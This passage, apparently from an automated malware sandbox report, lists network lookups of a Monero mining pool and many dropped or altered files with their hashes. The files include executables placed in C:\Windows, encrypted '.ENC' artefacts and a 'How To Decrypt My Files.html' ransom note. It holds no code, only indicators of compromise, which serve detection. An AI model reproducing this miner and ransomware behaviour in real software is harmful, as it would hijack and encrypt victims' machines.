| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
Files
C:\Windows\systemprocess.exe
| MD5 | b5e966fbfca567c51d5da8b2106a48e5 |
| SHA1 | 164ace9df43f1a760c1205f82c9cc4eb1dfee991 |
| SHA256 | 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8 |
| SHA512 | 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534 |
memory/3880-13-0x00007FF973523000-0x00007FF973525000-memory.dmp
C:\Windows\host.exe
| MD5 | 1cf0ec247776f6817231070a2f75994c |
| SHA1 | 3253eccccece8243d11975e7021569251def8f2f |
| SHA256 | e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051 |
| SHA512 | f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90 |
memory/3880-21-0x000001A4E37B0000-0x000001A4E3942000-memory.dmp
C:\Windows\CompPkg.exe
| MD5 | 39ba631f3e54a2c480e7c83e5e6d14ff |
| SHA1 | 82f3e3f1faf9d879a37e473a81cb5d32672af099 |
| SHA256 | 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64 |
| SHA512 | 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16 |
memory/3880-32-0x000001A4FDD10000-0x000001A4FDD2C000-memory.dmp
memory/1060-33-0x00000000006C0000-0x000000000072A000-memory.dmp
memory/2336-34-0x0000000004A50000-0x0000000004A86000-memory.dmp
memory/3880-35-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
memory/2336-36-0x00000000050C0000-0x00000000056E8000-memory.dmp
memory/2336-38-0x0000000004F70000-0x0000000004FD6000-memory.dmp
memory/2336-39-0x0000000004FE0000-0x0000000005046000-memory.dmp
memory/2336-37-0x0000000004ED0000-0x0000000004EF2000-memory.dmp
memory/2336-49-0x0000000005980000-0x0000000005CD4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yobw5zrl.eix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2336-60-0x0000000005FB0000-0x0000000005FFC000-memory.dmp
memory/2336-59-0x0000000005F80000-0x0000000005F9E000-memory.dmp
memory/3880-64-0x000001A4FDDF0000-0x000001A4FDE02000-memory.dmp
memory/3880-65-0x000001A4FDE00000-0x000001A4FDE3A000-memory.dmp
memory/3880-66-0x000001A4FE090000-0x000001A4FE0E0000-memory.dmp
memory/3880-67-0x000001A4FE1A0000-0x000001A4FE252000-memory.dmp
memory/3880-68-0x000001A4FDE40000-0x000001A4FDE8E000-memory.dmp
memory/3880-69-0x000001A4FE0E0000-0x000001A4FE12C000-memory.dmp
memory/3880-71-0x000001A4FE460000-0x000001A4FE48A000-memory.dmp
memory/3880-70-0x000001A4FE130000-0x000001A4FE17A000-memory.dmp
memory/4440-73-0x0000000006210000-0x000000000622A000-memory.dmp
memory/4440-72-0x0000000007380000-0x00000000079FA000-memory.dmp
memory/2336-75-0x00000000703A0000-0x00000000703EC000-memory.dmp
memory/2336-74-0x0000000006540000-0x0000000006572000-memory.dmp
memory/2336-85-0x0000000006520000-0x000000000653E000-memory.dmp
memory/2336-86-0x0000000007160000-0x0000000007203000-memory.dmp
memory/4440-88-0x00000000070F0000-0x0000000007182000-memory.dmp
memory/4440-87-0x0000000007FB0000-0x0000000008554000-memory.dmp
memory/2336-92-0x0000000007320000-0x000000000732A000-memory.dmp
memory/3880-93-0x000001A4FE5F0000-0x000001A4FE602000-memory.dmp
memory/3880-94-0x000001A4FE650000-0x000001A4FE68C000-memory.dmp
memory/2336-95-0x0000000007540000-0x00000000075D6000-memory.dmp
memory/2336-96-0x00000000074B0000-0x00000000074C1000-memory.dmp
memory/2336-97-0x00000000074F0000-0x00000000074FE000-memory.dmp
memory/2336-98-0x0000000007500000-0x0000000007514000-memory.dmp
memory/2336-99-0x00000000075E0000-0x00000000075FA000-memory.dmp
memory/2336-100-0x0000000007530000-0x0000000007538000-memory.dmp
memory/3880-104-0x00007FF973523000-0x00007FF973525000-memory.dmp
memory/3880-105-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
memory/3880-106-0x000001A4FE690000-0x000001A4FE6A2000-memory.dmp
memory/2592-112-0x0000018F49250000-0x0000018F49272000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b8a33aa094af018d8431665dc3e14d2f |
| SHA1 | be2e69b4850222a2263069d42aab90488b10faf2 |
| SHA256 | 42f33aec308ad7da8ae4d54a47cc23f2c1572c67a26e226abe969adebe263860 |
| SHA512 | 92c250840a6a18e2a5971ec6c2fc4a639e5c971fbef4d2efdd04f2d4c400b66696d573f4602c8d2807f2085d7e57c620405c4c6955be250488d444ee2a73b271 |
memory/704-121-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-120-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-125-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-123-0x0000000140000000-0x000000014002B000-memory.dmp
memory/704-122-0x0000000140000000-0x000000014002B000-memory.dmp
memory/6036-148-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-147-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-146-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-145-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-144-0x0000000140000000-0x000000014000D000-memory.dmp
memory/6036-151-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4832-152-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-154-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-153-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp
memory/4480-170-0x0000024ECD000000-0x0000024ECD02A000-memory.dmp
memory/4480-171-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp
memory/3148-176-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-175-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-174-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4480-172-0x00007FF990940000-0x00007FF9909FE000-memory.dmp
memory/3148-180-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-173-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3148-182-0x00007FF990940000-0x00007FF9909FE000-memory.dmp
memory/3148-181-0x00007FF9918F0000-0x00007FF991AE5000-memory.dmp
memory/3148-183-0x0000000140000000-0x0000000140008000-memory.dmp
memory/616-187-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
memory/616-186-0x000001C16DBD0000-0x000001C16DBF5000-memory.dmp
memory/616-188-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
memory/672-206-0x00007FF951970000-0x00007FF951980000-memory.dmp
memory/672-205-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp
memory/672-199-0x0000025D66AE0000-0x0000025D66B0B000-memory.dmp
memory/616-195-0x00007FF951970000-0x00007FF951980000-memory.dmp
memory/616-194-0x000001C16DC70000-0x000001C16DC9B000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa187cac09f051e24146ad549a0f08a6 |
| SHA1 | 2ef7fae3652bb838766627fa6584a6e3b5e74ff3 |
| SHA256 | 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f |
| SHA512 | 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log
| MD5 | fde7cc81ed0c50e7ce18702102f19ace |
| SHA1 | e9f02b348fda9b22bb3999b4ebef4d366f153086 |
| SHA256 | 00ac4add3fbf73f31bdeb249969dddc68da554c9e9383ec524d63c64dc3f4b53 |
| SHA512 | 75bf55c4f619948f16e29f51008d026e7789eda82615f566b150d54f5769b64d7fe1a6ff8be458e2630be621c551183dfe272ce0a579024065cbc2b4b26f4bf5 |
memory/3096-1470-0x0000000000F40000-0x0000000000FAA000-memory.dmp
memory/1060-1487-0x0000000000D10000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | f5c4fca52ede7a1173c28186128056d3 |
| SHA1 | c5184c28a972a646c8a3fe68f3c25e77ef2612af |
| SHA256 | 0bfe4ec1ae3f35ea64a3976443ad90f2825528df97c96a501f9a97af0fd74435 |
| SHA512 | 29694fe89b3037a0ca1ee95382791ee2f3c4a9dd0067f41cf1152234fd45c3282bd43ce4edcd8b8c015868a21df78cb9b2d52e145d1caa4a5e04d0524092da1b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a17e200fbd878dbf1c2ab1b41055a4a9 |
| SHA1 | 6230263ac84f203773d750583e6d161f1c196ea0 |
| SHA256 | 8506bb9534d6bd8a63eab4993f965128ed7f89d060b50da73219a1e753a50188 |
| SHA512 | 8545eafd94f53238b34aa11f90358c96139d1482194028a3cf42accc073714e1562f6b9619c9fff9958643c083defff75077aeed6c41d347d94fe3235375ce5e |
\??\pipe\crashpad_2016_GQJOXRGPYWMTSJZA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\ENC.img
| MD5 | 8c785c53009428b38afac4b7a6b93c10 |
| SHA1 | 2877606f84020beb917bd9b02483645bdcb07b42 |
| SHA256 | fa84153083d3de758fdc3ed86a9185f026755b9c89ba6f779ecd6df19ec1a94d |
| SHA512 | 23e20700b5d5f4c37c2701738f8ff5a010aaaca7ca4fce16703913dbe340239beb5ba403e92e7ef60b7e903b8d402e7ed29b7eee4048d7c4ec56de1ddb9db815 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 96520b2715b18824afc4ced48ea5533a |
| SHA1 | a029d7c1327d9b15c4bfffa361778e1f465f02db |
| SHA256 | 80280adb178086fd68f3d9c09140e5bcf9e680712bc58ee28d04e16c8c12731a |
| SHA512 | fcc93d51dcca3c06c8764d4f778da1a5851f5c7b9c126304f4d83c19163147b6698e0e33f72e398f42e595a2018a7df81860af84756490f7da4caced61000ded |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36326fcbb6119326e7c8aa24c4156548 |
| SHA1 | ed128a9727e1d58b970e732b8c66fc827b18372b |
| SHA256 | ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987 |
| SHA512 | ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe |
C:\Users\Admin\Desktop\How To Decrypt My Files.html
| MD5 | d945801bb65b57524011cf0474ba0f0f |
| SHA1 | eb4708741bb6dbce89239ddc1dad3a43dfb4403d |
| SHA256 | ff1afd836f4bc07130484d89690d8251dd10218cc15b5a15fa04228376f55268 |
| SHA512 | cc2d9b4f5467ea53f05f65d76047c7f9e9f6bef8dd618ae9f834cadefaece4ea71e7d3814c32be7fe3c4bad0b27d6aafb27b1b5a4dfcfb53e928356dd92abc21 |
memory/3880-1801-0x000001A480000000-0x000001A480528000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | ad194e8c7806b1994b56acba749ddf70 |
| SHA1 | 20ae0f73b983f0b748a6504f9fb1e1c7f8a6e802 |
| SHA256 | c0003276e0d4e9c32e76e44b101d019043e0b93af37ee8a81efd2aa6c8d35fe1 |
| SHA512 | f963b04d62119fae18c48951c350f1b49241292e711e6275e565f2de1cb017f6bc1c7e7759807a3f9fdacc9d0edf747a5665bf8395aecdbd19be98f85be88abb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 28ce813fea1e3b30cbbd0709cad09443 |
| SHA1 | 580e515ebb3d91dbfbc4e8b2a95e1ea7a4fe1646 |
| SHA256 | 77bc93285ab8c9c5aca6069322aabcb2c6af22ec7905a1ee06606dd549abdc6c |
| SHA512 | bcf45637c491f4b44ce24dd3de149cbed84f4c0a67ef87e9362d7741e1007f291f657fcded087392dd9641fca600a10c4d203b3a181a63dbb44dae25e8ab63a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1433a720a65253183624aad3dec9a45b |
| SHA1 | 1e33997bc96fbf453f194ab03609eab8eab2af8d |
| SHA256 | 4699b1d334c030584f1722a7b101f9046c1b0b2f51cc577519e1c828fb11c462 |
| SHA512 | 0608bf313b349ea43d8951d188709e6b832f709a9776e54edf9b2cb4ea4fc0d7e6fcaac925325d2296c3ed8e87b196c95053fc12e19b8eba3883423d700c9b03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | f39ad1b5334e3c05ea773dd1a5a379f8 |
| SHA1 | 5e97ca1a9b40bc933696893780f72bb2954ad17f |
| SHA256 | bcf7c1a033d62ebe1502524b8ec9248f955b17e6a9fe79e5717758c5f918b2c3 |
| SHA512 | 2555e680e55bd62e4574f3cd3f846e9cee3e08dd6cd5265dc80627f4fb24f939766f9bf5d80046cc2c8f08dbb99511b529788fe6fc373ac9b519fb3629e0c913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d24e447c83e1abe8a220d59708e9af4c |
| SHA1 | d82d24b49bd1fd8d9bfcfc21ef92d87dfc296e0b |
| SHA256 | 353fa9cd42fc4b3fd1f5110d9caca240288a9c21d5c53ab3902c1c9f97c5f081 |
| SHA512 | af4becd3c01dd0dcfd9aedaf817028efa6e5504408ceb0b1d9baaa79720532946643b9c0c764ef61b833a3c1f70c9237f16c3bf6f39dd9ab2c33c0867c50ffa8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b85910f60e03ac318ae6d385fa7567c3 |
| SHA1 | 36482aa7ecc8af72b9b06ad387232e2c0d6ef662 |
| SHA256 | d42917eecc4d4d49823b993666eb40d6849678fdf724a71238c16d744cb26206 |
| SHA512 | 89435e4472bc6590a1bc3a983a49590110a047c23e592604bd5e40c1e37bc0122025d8b904b01f54fa665a3cdb6edc080f45374569d49c28a0c884beb1cd99bd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0076526279bad6f48b87df29d93c8198 |
| SHA1 | 09784f630e60882893b77a6ec5df0e574abdb290 |
| SHA256 | d036875940f444d2cf0603ac81726abbfefdc2d5a6bf0852d6e0dfe83067f1f0 |
| SHA512 | 48cbf72c347aaf1ea23707f45658ca9386e5dfb1fed6c8c3fe56a53ae572e7747bdddbd0af034192bb512726889d21ebeada7d6ba24aa0295500057d99f96985 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dd2e0b582993de8fd19504fd7cf625cf |
| SHA1 | 1438136cb58ca0f46447e76ca0c5b464242ea097 |
| SHA256 | 2053b94262df44b382deee9b97c86c8e829c912415bc252a1ae628d1b32daeff |
| SHA512 | 72cfe01038c2e5c3c48087a74273c14f5cfac82b25f1fee40ecddb17779fe391b95fc5fe6f1a809f6b86be20961fdccd4e21544df793c5d3b827827380fec89d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | b2960e082ce87150e53f5d2ad4be8833 |
| SHA1 | f36f8a021247599690ce652a948b86c45b80fc16 |
| SHA256 | bdb1f5dedbd164e3d2b9881c46923abb602d429fca22e53d9370ac9c53462930 |
| SHA512 | 5d5ebb02e784de88b07750e3129fa2683276c2177fc512adfb704c4b2f75a24daa04af7e6a02558e30066cd6c623c3ab7212d9038587acb06b573197a796ebd4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cbf32db5aef5a6e9c65041d2dab622d9 |
| SHA1 | 90f35f5341522b1dac5e3e38ea1e256afdc6378f |
| SHA256 | 175328b47f399e244cccd9919b9040a87927059cca9901947262cbfb60a83c57 |
| SHA512 | 2603849f411bc946af8dc0fcf1201b0829d3a25ade5be8e865002fd9a07be2cc7f236669ba39c478056fdd9cbbd5d043d2650f2d21ecf1b92ac1270a75e41183 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 67d0b77a2005e6529c30a42d27d809c7 |
| SHA1 | 0aed333411d87e7e3226cef0bbe222a57edb1661 |
| SHA256 | 0d78f432287723a7b9da232b63745905d12e2aa6c5505bba3660e2ac8a3ad509 |
| SHA512 | 9c24a17888c2df18ac66268a59a4fbfc73d74c241f6a02a1b3bfaa171228635929d60f0a575289e78670bf5f785f67f326ae3add528adb0e3f61848c5b16bbe5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 458f1861e184d55ef4d96b05eed2fb66 |
| SHA1 | 70db872ea8232600581ce8ddd26a93955de83b43 |
| SHA256 | 7649fe588036ca9b083f094272b0a7b686e0edc25dd2fc2da14493608ad3abf3 |
| SHA512 | ea77c2a1783abfebb2edcdd0bd55566a88f8d05d69626c60dc883c2edf61985572744e300f462afeaece87993ace853651685615ab7dca56030f67c37c661980 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1a98274bfa86069be7b0dbb8dcf167a0 |
| SHA1 | 015c7e8839830f394ecfa783b3c6aa3f182616f8 |
| SHA256 | 2ae2e64444ccf61d904020c5a4b516ba8f02bc4fd113ca999481977eb544531d |
| SHA512 | 748bd0b92078cf6b80b7c2dfce8c6fb2117f2e9286eb63335fdad35d903dc6e8fe8221ca32608aea6147f7668185e8b9d8136af8c2cbc3369e4e551edb4c3650 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | d1f9a1a945298dc40fa5c98ba379c77d |
| SHA1 | 96b527884a744c8d37a9d5f1d26e83bd3cf38da2 |
| SHA256 | f06c9c32e7e5efff0e137b68bebcb3c3cee87578f20f6e5692c0c0c472f241bc |
| SHA512 | f91bc378ef7ee5d7b1fe0526e6bc6bb307d05e57df17fc62de277cf2d05da8f4821f2154334185024bc371162355c708b719d21bca54aa86a08185a7bc27d1d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG
| MD5 | c626ad11649c79e3fd021247d60eb1af |
| SHA1 | 12a27ce93a15941c82712138c49c09b70fb0d7a4 |
| SHA256 | 0b486accc79f7bf758bebfac8c94df1b45fc0abd218b7df8a4ff950d6a8633f9 |
| SHA512 | 690ac7b44bd55210848352d9adbce3c7cf9faa7fd75fe7e701722e5ce598ab026b88e809cd296222ff0a3ccece2f8a8a6a654e71fc9c509db28e3ae5fdcc1a37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
| MD5 | e30c8acefa2c4297eb1ec8f7d5154e18 |
| SHA1 | 9dd81a5adfd2c00bf2a346ab341131db13745957 |
| SHA256 | d850bb6bd280a6ca96adee87974d99cee6af09c11af17a51d9486d3a732fbb3d |
| SHA512 | 1e31c247dfa9acc261131ae46a96153b7fd83f141f555c4252239187be9108613b59be77d436349e42bf9e181acf37db6d22957c56e792e6d10cd1aaa67e4e51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
| MD5 | 61c83dfd5f24c2d83f36b4d57a2b0b78 |
| SHA1 | 92a17768440a7f0882550b7425ad4c1821c46328 |
| SHA256 | 30686e7d2547790ac5bf8d87c0b4a0eb6f3282ea15097ee5565a326e7794b57a |
| SHA512 | 38ce4f1754422109afa5b9e33e1eb00dac82c7d657062959107468e74153fd19d53ee4c232cdd2ee8a1ab5320d1cb9f0f2c01a25fb1cdc1616413307c1c14728 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 2655aa40d903b6e2c13f1a9715a68b15 |
| SHA1 | 85acf76f1117730ac9c0c8ef120ee5168330dd7a |
| SHA256 | 4c596282fab16f2720c1dfc35c79236d7e9f7741742a96744d4666cf2ac7355f |
| SHA512 | 2934f9bdceefa02462ddd98d64e6fdc8f677725760dc8ef209bed56548c5f017688d2436d1033844e61cb0f651a68f4d5040bd3c9395ae178179a34d3e04fa04 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | f03fa59413375068ade61faf7a993ce1 |
| SHA1 | 71b7a64a6c357e8585c2ab4142499e51c346fb77 |
| SHA256 | dc07756791fb5e3f19d37bff28c8f542d5415cecfdc72192c07b31d4cb7f48ca |
| SHA512 | cc1cf3c68e3d61b66f539e50b1bbe07b93734f9ab86d2fbd8f3f3c18cb1b8ed7f7b110fa179ed153ff51a40c389dd27f316674b6c222af8c612eb9362a573a4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | a6ed6b45dad3d9c439fff83c2695be38 |
| SHA1 | 4418a8bf205652dfd0a04272c1b9ef6b65e41938 |
| SHA256 | 78b6849ce51328c8f69f6b6cbd532c861cd53eba60df68972c65122bda98e2ea |
| SHA512 | 41bd3ed160c11a412973bc7d4cf8906c03c7c38a06cb75e68f8ca1ba7a9de8d2429d75852117539a10cb94b905944d5ae302e760859bcaca16597555c38288c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
| MD5 | 62f13551681b6458bbc711c8b52cb7ab |
| SHA1 | 1de05426e07f486a436465f43180f3126f325dde |
| SHA256 | 215ec52c8e80c69fb6c2f7323153bfb04c8bfe090c248f84defa05de66313706 |
| SHA512 | 92509a1540c4051f652164bf308a9712462589ec7122ed934b2438aead86020652dc5cc474d24389b79883b7d37fab5f0345565d022452f659c9fb202dba47f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | b5781c95d34c86654d040027ea2d6853 |
| SHA1 | 2ab83bada6335a2aa40e7b828fae69aebd2cc85f |
| SHA256 | 7099407217378f6593f672ee6231853742e864647aed01f49cc13ef08d93899b |
| SHA512 | f32502abbeeff587eb633cdfe9a6d0f577fdfc33a412493338b65683aea220eb474460b2a7e0f34eefc0b1117f960b216bdeb06efd80c866648c5a4f0728a5ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 3e45022839c8def44fd96e24f29a9f4b |
| SHA1 | c798352b5a0860f8edfd5c1589cf6e5842c5c226 |
| SHA256 | 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd |
| SHA512 | 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 59d3e3ccb8d73684023b287c1dc4650a |
| SHA1 | f989d6d53547697667335762bd843a6b26ea04f5 |
| SHA256 | da635f10f1c92925f0579ebbfaccfe6512a81255722740213808bc39ebf5c6c7 |
| SHA512 | 038d405074d54756d8b0daafdfb6d0b9382bbfc40b2a2e630b92fcf797fca05e987d1c3ae0e0240f21d55216f51d3c0bdd88a7bc6ebea11b72ac1fca36309e28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 02fa9cfba0efa98d9cecef5c87ce62d5 |
| SHA1 | 697d65a9e5f14e4fdd2258d9dda600085ba95edb |
